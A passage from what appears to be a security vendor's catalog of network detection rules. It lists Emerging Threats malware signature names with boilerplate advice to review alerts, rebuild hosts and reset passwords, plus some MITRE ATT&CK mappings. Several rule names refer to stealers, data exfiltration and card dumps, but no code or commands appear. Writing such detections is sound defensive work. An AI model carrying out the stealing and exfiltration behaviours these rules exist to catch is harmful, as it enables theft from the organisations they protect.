Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this family is ransomware, also check the host and any shares it can reach for encrypted files and confirm that backups are intact.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Gasti.tm Checkin Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Gatak Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Gatak.DR Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Gatak.DR Payload Instructions

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/GenKryptik.FKJZ CnC Exfil

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.Genome Initial Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Geodo Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Girostat Stealer (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.Glupteba/ClIEcker CnC Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/GrandaMisha Sending System Information (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Grimagent CnC Activity

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Hancitor Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32.HLLW.Autoruner USA_Load UA

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Htbot.B Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/HydraCrypt CnC Beacon 1

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/HydraCrypt CnC Beacon 3

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Hyteod CnC Beacon

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/IcedID Requesting Encoded Binary M4

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/IcedID Requesting Encoded Binary M5

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/IcedID WebSocket Request M2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Infostealer.Snifula File Upload

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/InfoTester Checkin

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 1

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 2

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.BXEW Variant HTTP CnC Beacon 3

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password. Because this beacon is mapped to exfiltration over the command-and-control channel, also determine what data the host sent to the remote server.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Injector.DSQR CnC Activity (POST)

Description

This detection identifies malware-related network activity matched by the Emerging Threats (ET) signature named above, using Rapid7’s Insight Network Sensor. Malicious actors often use malware to gain access to victim organizations.

Recommendation

Review the alert in question. If the activity is confirmed malicious, rebuild the host from a known-good source and have the user change their password.

ET MALWARE Win32/Injector.ULH CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ispen BADNEWS CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/Ispen BADNEWS Fake User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Jackpot Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32.Jadtre Retrieving Cfg File

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/JSWORM Ransomware Style Geo IP Check M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/JSWORM Ransomware Style Geo IP Check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Kaicone.A Checkin via HTTP POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Kazy Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Keatep.B Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kelihos.F Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kelihos.F exe Download 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ketrican CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Koubbeh Sending Windows System Info

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WIN32/KOVTER.B Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kribat-A Downloader Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.BSYO Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.BSYO Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.FVVZ Variant CnC Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HCZR Variant Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HMCH Dropper User-Agent M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HNBU CryptoMiner - GetTasks Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kryptik.HNBU CryptoMiner - Report Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Krypton Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Kuluoz.B Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Initial Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Reporting

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Lager Trojan Reporting (gcu)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Laturo Stealer CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Limbozar Ransomware Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/LNK/Agent.GX Javascript Downloader M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LNK/Agent.GX Javascript Downloader M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen.BW Payment Info

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen.BW Payment Info 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LockScreen CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/LockScreen CnC HTTP Pattern

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.3.5 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.3.6 CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/LODEINFO v0.4.x CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/MailerBot CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Malgent!MSR Dropper Requesting Payload

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Malgent!MSR User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Matsnu.L Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Meredrop Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/MereTam.A Ransomware CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/MereTam.A Ransomware CnC Init Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Mingloa CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Mole Ransomware CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32/MOOZ.THCCABO CoinMiner CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Resource Hijacking - T1496

ET MALWARE Win32.MSUpdater C&C traffic GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Napolar.A Getting URL

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Necurs

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Necurs Common POST Header Structure

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Nemty Ransomware Style Geo IP Check M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Data Encrypted for Impact - T1486

ET MALWARE Win32/Neshta.A Posting Data

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neurevt.A/Betabot checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neurevt.A/Betabot Check-in 4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Bot Fake 404 Checkin Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino CC dump

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino Checkin 6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Neutrino ping

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/NitroStealer CnC Exfil M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/NitroStealer/exoStub CnC Exfil

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nivdort Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nivdort Posting Data 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nubjub.A HTTP Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Nuclear Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Oliga Fake User Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/OnLineGames GetMyIP Style Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Mailer Module Communicating with CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Receiving Commands from CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Onliner Requesting Additional Modules

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Pamesg/ArchSMS.HL CnC Checkin

Description

